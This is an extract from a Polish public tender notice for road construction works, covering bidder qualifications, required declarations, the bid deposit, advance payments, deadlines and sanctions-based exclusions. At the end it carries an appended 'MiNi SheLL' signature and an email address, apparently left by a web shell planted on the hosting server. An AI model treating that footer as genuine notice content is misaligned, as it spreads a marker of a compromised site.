Zamawiający wymaga:<br/>a) złożenia przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu;<br/>b) aby Wykonawcy nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie (w rozumieniu ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane – t.j. Dz. U. z 2021 r. poz. 2351 z późn. zm.) drogi o wartości nie niższej niż 1.100.000,00 zł brutto (słownie: jeden milion sto tysięcy złotych 00/100);<br/>c) aby Wykonawcy dysponowali co najmniej jedną osobą do kierowania robotami w specjalności inżynieryjnej drogowej;<br/>d) aby Wykonawcy dysponowali co najmniej jedną osobą do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>e) aby Wykonawcy dysponowali co najmniej jedną osobą do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>f) aby Wykonawcy dysponowali co najmniej jedną osobą do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych.<br/>2.	Jeśli Wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to warunek określony w ust. 1 pkt 4 lit. a musi spełniać każdy z Wykonawców, w zakresie w jakim każdy z Wykonawców wykazuje spełnienie warunku udziału w postępowaniu, natomiast warunek określony w ust. 1 pkt 4 lit. b- f musi spełniać co najmniej jeden z Wykonawców składających ofertę wspólną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Na wezwanie Zamawiającego Wykonawca zobowiązany jest złożyć następujące podmiotowe środki dowodowe:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2)	wykaz osób odpowiedzialnych za kierowanie robotami w specjalności:<br/>•	inżynieryjnej drogowej - co najmniej jedna osoba;<br/>•	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych- co najmniej jedna osoba;<br/>•	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych- co najmniej jedna osoba;<br/>•	instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych- co najmniej jedna osoba;<br/>wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego oraz podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty (tj. Formularza oferty) Wykonawca dołącza:<br/>1)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – składane na podstawie art. 125 ust. 1 ustawy Pzp – Załącznik nr 1.<br/>2)	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – składane na podstawie art. 125 ust. 1 ustawy Pzp – Załącznik nr 2.<br/>2.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniami, o którym mowa w ust. 1, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby, tj.:<br/>1)	Oświadczenie Podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu – składane na podstawie art. 125 ust. 5 ustawy Pzp – Załącznik nr 1a.<br/>2)	Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu – składane na podstawie art. 125 ust. 5 ustawy Pzp – Załącznik nr 2a.<br/>Oświadczenia składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.	Inne dokumenty dołączane do Formularza oferty:<br/>1)	Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów.<br/>2)	W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi.<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby – Załącznik Nr 3 lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. /jeżeli dotyczy/<br/>4)	Oświadczenie z art. 117 ust. 4 Pzp - Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia – Załącznik Nr 4./jeżeli dotyczy/ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: 15 000,00 złotych.<br/>[Szczegółowe informacje dotyczące wadium zostały określone w Rozdziale XIII SWZ- ze względu na ograniczoną ilość wprowadzenia znaków w ogłoszeniu o zamówieniu] <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Oferta wspólna:<br/>1)	W przypadku złożenia oferty wspólnej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Oferta wspólna musi spełniać wymagania:<br/>a) oświadczenie, o którym mowa w Rozdz. XI ust. 1 pkt 1 SWZ składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub<br/>- pełnomocnik (umocowany do składania oświadczeń) w imieniu każdego z Wykonawców osobno.<br/>b) oświadczenie, o którym mowa w Rozdz. XI ust. 1 pkt 2 SWZ składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(na oddzielnym formularzu) lub<br/>- pełnomocnik (umocowany do składania oświadczeń) w imieniu każdego <br/>z Wykonawców osobno.<br/>2.	Jeśli Wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to warunek określony w Rozdz. IX ust. 1 pkt 4 lit. a SWZ musi spełniać każdy z Wykonawców, w zakresie w jakim każdy z Wykonawców wykazuje spełnienie warunku udziału w postępowaniu, natomiast warunek określony w Rozdz. IX ust. 1 pkt 4 lit. b- f SWZ musi spełniać co najmniej jeden z Wykonawców składających ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Rozliczenia finansowe za wykonane roboty będą się odbywały w następujący sposób:<br/>1)	Zamawiający udzieli Wykonawcy zaliczki na poczet wykonania zamówienia w wysokości stanowiącej różnicę pomiędzy wynagrodzeniem ryczałtowym brutto określonym w § 3 ust. 1 niniejszej umowy a wysokością kwoty brutto wskazanej w fakturze końcowej (§ 3 ust 2 pkt 2 umowy). Zaliczka nie będzie niższa niż 5% tegoż wynagrodzenia ryczałtowego brutto;<br/>2)	pozostała część wynagrodzenia umownego w wysokości do 95% wynagrodzenia ryczałtowego brutto określonego w § 3 ust. 1 niniejszej umowy, jednak nie wyższej niż 3.500.000,00 zł brutto (słownie: trzy miliony pięćset tysięcy złotych 00/100), zostanie wypłacona po zakończeniu realizacji przedmiotu umowy na zasadach określonych w niniejszej umowie.<br/>2.	Rozliczenia finansowe za wykonane roboty będą odbywały się na podstawie:<br/>1)	faktury zaliczkowej Wykonawcy, wystawionej zgodnie z obowiązującymi przepisami i postanowieniami niniejszej umowy;<br/>2)	faktury końcowej Wykonawcy wystawionej za wykonane przez siebie i podwykonawców roboty, usługi i dostawy po zakończeniu robót i ich odebraniu przez komisję odbioru końcowego na podstawie protokołu odbioru końcowego robót. Kwota faktury końcowej zostanie pomniejszona o kwotę zaliczki udzielonej wcześniej przez Zamawiającego.<br/>3.	Zasady udzielenia zaliczki:<br/>1)	zaliczka jest płatna a conto na poczet zapłaty wynagrodzenia Wykonawcy – rozliczenie zaliczki nastąpi poprzez pomniejszenie o jej kwotę nominalnej kwoty przypadającej do zapłaty na rzecz Wykonawcy za wykonanie całości zamówienia;<br/>2)	warunkiem zapłaty zaliczki w terminie wskazanym w § 3 ust. 10 jest wystawienie i doręczenie Zamawiającemu przez Wykonawcę prawidłowej faktury zaliczkowej wraz z zabezpieczeniem zwrotu zaliczki w jednej z form, o których mowa w ust. 6 poniżej;<br/>3)	jeżeli zaliczka nie zostanie rozliczona przed ostatecznym rozliczeniem wykonanych robót, wypowiedzeniem Umowy przez Zamawiającego lub Wykonawcę, w szczególności z uwagi na wystąpienie siły wyższej, cała wartość udzielonej, a niespłaconej zaliczki stanie się natychmiast wymagalna i płatna Zamawiającemu przez Wykonawcę w terminie 30 dni roboczych od dnia otrzymania wezwania do zwrotu nierozliczonej części zaliczki;<br/>4)	Jeżeli zaliczka jest przeznaczona na płatności dla Podwykonawcy lub dalszego Podwykonawcy, przy rozliczeniu zaliczki Wykonawca jest zobowiązany do przedstawienia dowodu zapłaty zaliczki lub wynagrodzenia Podwykonawcy.<br/>4.	Faktura zaliczkowa zostanie wystawiona przez Wykonawcę w terminie do 30 dni od dnia zawarcia niniejszej umowy.<br/>5.	Wraz z wystawieniem i doręczeniem faktury zaliczkowej, Zamawiający będzie żądał od Wykonawcy dostarczenia zabezpieczenia zwrotu zaliczki na 100% jej wysokości, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>6.	Termin ważności zabezpieczenia zwrotu zaliczki musi obejmować okres od dnia wystawienia przez Wykonawcę faktury zaliczkowej do dnia zakończenia robót przewidzianego niniejszą umową plus 30 dni.<br/>7.	Strony zgodnie ustalają, że zabezpieczenie zwrotu zaliczki podlega zwrotowi na rzecz Wykonawcy w terminie do 30 dni od dnia wykonania całości zamówienia i uznania przez Zamawiającego za należycie wykonane.<br/>8.	Podstawę do wystawienia faktury końcowej stanowi protokół odbioru robót bez wad, o którym mowa w § 6 umowy.<br/>9.	Zamawiający dokona płatności (w formie zaliczki) ze środków z udziału własnego w realizacji inwestycji, w terminie do 30 dni od daty otrzymania prawidłowo wystawionej i doręczonej Zamawiającemu faktury zaliczkowej wraz z zabezpieczeniem zwrotu zaliczki. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu Stron w formie pisemnego aneksu pod rygorem nieważności (określone w § 11 Projektu umowy, stanowiących załącznik nr 6 do SWZ);<br/>2. Waloryzacja wynagrodzenia została określona w § 11a Projektu umowy, stanowiących załącznik nr 6 do SWZ.<br/>[Rodzaje i zakresy zmian oraz warunki waloryzacji wynagrodzenia, zostały określone w Projekcie umowy, stanowiących załącznik nr 6 do SWZ- ze względu na ograniczoną ilość wprowadzenia znaków w ogłoszeniu o zamówieniu] <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umsierpc.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Z postępowania o udzielenie zamówienia publicznego wyklucza się na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835 z późn. zm.): <br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.), zwanego dalej „rozporządzeniem 765/2006” i rozporządzeniu 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.), zwanego dalej „rozporządzeniem 269/2014” albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego; <br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego; <br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/>2. Wykluczenie następuje na okres trwania okoliczności określonych w ust. 1.<br/>3.	Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com